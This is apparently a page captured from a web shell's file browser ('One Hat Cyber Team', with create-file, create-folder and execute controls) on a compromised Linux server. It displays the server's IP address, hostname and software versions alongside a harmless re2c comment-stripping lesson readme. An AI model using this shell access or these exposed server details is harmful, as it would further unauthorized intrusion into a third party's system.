⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.38
Server IP:
15.204.235.159
Server:
Linux srv.techlup.co.ke 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Server Software:
Apache
PHP Version:
8.2.27
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
re2c
/
lessons
/
002_strip_comments
/
View File Name :
readme.txt
re2c lesson 002_strip_comments, (c) M. Boerger 2006 In this lesson you will learn how to use multiple scanner blocks and how to read the input from a file instead of a zero terminated string. In the end you will have a scanner that filters comments out of c source files but keeps re2c comments. The first scanner can be generated with: re2c -s -o t.c strip_001.s.re In the second step we will learn about YYMARKER that stores backtracking information. re2c -s -0 t.c strip_002.b.re The third step brings trailing contexts that are stored in YYCTXMARKER. We also change to use -b instead of -s option since the scanner gets more and more complex. re2c -b -0 t.c strip_002.b.re